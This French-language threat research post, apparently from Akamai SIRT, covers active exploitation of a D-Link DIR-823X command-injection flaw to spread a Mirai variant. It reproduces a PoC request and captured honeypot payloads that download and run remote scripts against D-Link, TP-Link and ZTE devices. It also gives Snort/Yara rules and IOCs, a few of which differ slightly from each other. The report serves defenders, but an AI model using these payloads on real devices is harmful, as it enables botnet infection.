Points à retenir
L'équipe SIRT (Security Intelligence and Response Team) d'Akamai a identifié une exploitation active de la vulnérabilité CVE-2025-29635, une faille d'injection de commandes affectant les routeurs D-Link série DIR-823X. Bien que ces terminaux aient été retirés du marché en 2025, des acteurs malveillants exploitent cette faille pour déployer des variantes du botnet Mirai.
L'équipe SIRT a détecté cette activité dans notre réseau mondial de pots de miel pour la première fois en mars 2026. Il s'agit de la première exploitation active signalée depuis la divulgation initiale de cette vulnérabilité en mars 2025.
Nous avons inclus une liste d'indicateurs de compromission (IOC) dans cet article de blog pour aider à la défense contre cette menace.
Découverte de tentatives actives d'exploitation de D-Link
Début mars 2026, l'équipe SIRT d'Akamai a observé des tentatives actives d'exploitation de la vulnérabilité CVE-2025-29635 dans notre réseau mondial de pots de miel. Cette vulnérabilité affecte les routeurs D-Link série DIR-823X, qui utilisent les micrologiciels 240126 et 24082. Elle permet à un attaquant autorisé d'exécuter des commandes arbitraires à distance en envoyant une requête POST vers le point de terminaison /goform/set_prohibiting, via la fonction correspondante, ce qui déclenche une exécution de commandes à distance.
Analyse de la faille du micrologiciel CVE-2025-29635
Divulguée publiquement fin mars 2025, la vulnérabilité CVE-2025-29635 est une faille d'injection de commandes dans les routeurs D-Link série DIR-823X qui affecte les versions de micrologiciel 240126 et 24082. Selon le fournisseur, ces modèles sont retirés du marché depuis septembre 2025.
Les chercheurs en sécurité Wang Jinshuai et Zhao Jiangting ont découvert et signalé cette faille, puis procédé à la rétro‑ingénierie de la fonction sub_42232C dans le fichier binaire présenté à la Figure 1. Ils ont alors constaté que la valeur du paramètre macaddr est copiée dans la variable de commande via la fonction snprintf, après quoi la fonction system est appelée. En manipulant délibérément la valeur de macaddr, un attaquant peut déclencher l'exécution de commandes en envoyant une requête POST vers /goform/set_prohibiting.
Fig. 1: The CVE-2025-29635 firmware flaw
Les chercheurs avaient publié une preuve de concept (PoC) publique d'exploitation de la CVE, mais elle a été supprimée depuis (Figure 2). À la date de rédaction, cette vulnérabilité ne figurait pas dans le catalogue des vulnérabilités connues et exploitées de la CISA.
POST /goform/set_prohibiting HTTP/1.1
Host: 192.168.122.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Origin: http://192.168.122.130
Connection: close
Referer: http://192.168.122.130/login.html
Cookie: sessionid=00000000000000000000000000000000; token=00000000000000000000000000000000
macaddr=||touch%20/set_prohibiting||&token=00000000000000000000000000000000Les données des pots de miel révèlent des campagnes de botnet actives
Début mars 2026, l'équipe SIRT d'Akamai a détecté des tentatives actives d'exploitation de la vulnérabilité CVE-2025-29635 dans notre réseau mondial de pots de miel (voir la Figure 3).
POST /goform/set_prohibiting HTTP/1.1
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
parameter=;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget http://88.214.20[.]14/dlink.sh -O dlink.sh; curl -o dlink.sh http://88.214.20[.]14/dlink.sh; wget http://88.214.20[.]14/dlink.sh; chmod 777 dlink.sh; sh dlink.sh; tftp 88.214.20[.]14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20[.]14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20[.]14 ftp1.sh ftp1.sh; sh ftp1.sh;Une grande partie de la requête présentée dans la Figure 3 correspond à la PoC de la Figure 2, mais avec quelques différences notables. En effet, cette tentative ne contient pas certains en-têtes, tels que Referer et Accept-Language. Elle ne fournit aucune information d'authentification, que ce soit sous forme de jetons ou d'identifiants de session, ni dans les en-têtes ni dans le corps de la requête.
Cependant, le micrologiciel ne semble pas capable de vérifier la présence ou la validité de ces champs et valeurs. En raison de cette faille, le routeur extrait depuis le corps de la requête la valeur qui est placée dans le tampon de commande, sans contrôler le champ de formulaire d'origine. Si l'analyseur considère chaque paire clé-valeur du corps comme un candidat pour le champ macaddr, ou s'il copie simplement l'intégralité du corps dans le tampon, un attaquant peut injecter une charge utile malveillante sous n'importe quel nom arbitraire (parameter, par exemple).
Ainsi, bien que cette tentative d'exploitation diffère sur certains points de la PoC, elle emprunte le même chemin de code vulnérable et déclenche le même appel à system(), qui exécute la chaîne de commandes shell fournie.
Analyse technique de la variante Mirai
Le script shell récupéré lors de la tentative d'exploitation est très simple et directe : il télécharge puis exécute une charge utile malveillante Mirai appelée « tuxnokill », compatible avec plusieurs architectures, depuis la même adresse IP de téléchargement 88.214.20[.]14. Le logiciel malveillant correspond à une variante classique de Mirai, qui utilise un encodage XOR avec une clé de déchiffrement 0x30. Il contient également une chaîne d'exécution console codée en dur (« segmentation fault (core dumped) »), typique des charges utiles Mirai, ainsi qu'une adresse IP de téléchargement intégrée. D'après les connexions observées en sandbox, l'adresse IP de commande et contrôle est 64.89.161[.]130, sur le port 44300.
Contrairement à d'autres attaquants, qui commencent à recourir au code généré par l'IA, cet acteur semble avoir développé sa charge utile de manière traditionnelle, comme en témoigne la chaîne de caractères codée en dur dans son logiciel malveillant : « AI.NEEDS.TO.DIE ». Les commandes d'attaque observées dans le logiciel malveillant sont relativement classiques (Figure 4).
TCP STOMP
TCP ACK
TCP SYN
STD
GRE ETH
UDP DNS
UDP VSE
UDP PLAIN
UDP GENERIC
RAW
XMAS
HTTP NULLExploitation observée de vulnérabilités affectant des équipements TP-Link et ZTE
En plus de cibler la CVE-2025-29635, nous avons constaté que ce cybercriminel a tenté d'exploiter deux autres vulnérabilités dans notre réseau de pots de miel : la CVE-2023-1389 (Figure 5), qui affecte les équipements TP-Link Archer AX21, ainsi qu'une faille d'exécution de code à distance (RCE) sur les routeurs ZTE ZXV10 H108L (Figure 6).
POST /cgi-bin/luci/;stok=/local?form=country HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id>curl -o tplinkwan.sh http://88.214.20[.]14/tplinkwan.sh; wget http://88.214.20[.]14/tplinkwan.sh; chmod 777 tplinkwan.sh; sh tplinkwan.sh; tftp 88.214.20[.]14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20[.]14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20[.]14 ftp1.sh ftp1.sh; sh ftp1.sh)POST /manager_dev_ping_t HTTP/1.1
Host: honeypot_ip:8083
User-Agent: Go-http-client/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&Host=;$(cd /tmp;wget http://88.214.20[.]14/bins/tux.mips; chmod 777 tux.mips; ./tux.mips zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submitConclusion
Les campagnes de logiciels malveillants Mirai continuent de peser sur le secteur, car une grande partie du code source d'origine est toujours réutilisée par divers acteurs malveillants, qu'ils soient expérimentés ou non. La facilité d'accès et les potentiels avantages financiers comptent parmi les facteurs qui incitent de nouveaux cybercriminels à investir l'écosystème des botnets.
Si cet attaquant semble avoir une aversion marquée pour l'IA, beaucoup d'autres y voient au contraire un outil qu'ils peuvent employer à des fins malveillantes. Que ce soit pour les aider à développer des logiciels malveillants ou à identifier de nouvelles vulnérabilités, le potentiel de l'IA est bien réel, tant pour les attaquants que pour les défenseurs.
Dans l'écosystème des botnets, les vulnérabilités anciennes restent des cibles de choix pour de nombreux cybercriminels. Lorsque des PoC publiques de ces vulnérabilités existent, les attaquants peuvent facilement les intégrer à leurs vecteurs d'exploitation.
Malheureusement, de nombreuses entreprises à travers le monde ne configurent pas leurs terminaux correctement, tardent à appliquer les correctifs nécessaires ou continuent d'utiliser des équipements obsolètes, comme c'est le cas des routeurs D-Link série 823X. Nous recommandons vivement aux entreprises de surveiller régulièrement les vulnérabilités divulguées qui affectent leur infrastructure et d'appliquer sans délai les correctifs, mises à jour et mesures de protection appropriés pour garantir leur sécurité opérationnelle.
Suivez-nous
L'équipe SIRT d'Akamai continuera à surveiller ces menaces et à en rendre compte, tant pour nos clients que pour la communauté de la sécurité dans son ensemble. Pour rester au fait des publications de l'équipe SIRT et du groupe Security Intelligence d'Akamai, consultez notre page d'accueil de recherche et suivez-nous sur les réseaux sociaux.
IOC
Nous avons inclus une liste d'indicateurs de compromission, ainsi que des règles Snort et Yara, pour aider les défenseurs.
Règles Snort pour les adresses IP malveillantes
alert ip any any -> [88.214.20.14, 64.89.161.130] any (
msg:"Possible Botnet Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)Règles Yara pour les échantillons de logiciels malveillants
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2026-03-27"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$string1 = "segmentation fault (core dumped)"
$string2 = “AI.NEEDS.TO.DIE”
$ip1 = "88.214.20.14"
$ip2 = "64.89.161.13"
$hash1 = "32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100"
$hash2 = "be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b"
$hash3 = "d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7"
$hash4 = "7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8"
$hash5 = "72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8"
condition:
(
$string1 or
$string2 or
$ip1 or
$ip2 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5
)
}Adresses IPv4 malveillantes
88.214.20.14
64.89.161.130
Hashs SHA256
2ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100
be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b
d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7
7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8
72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8
Mots-clés
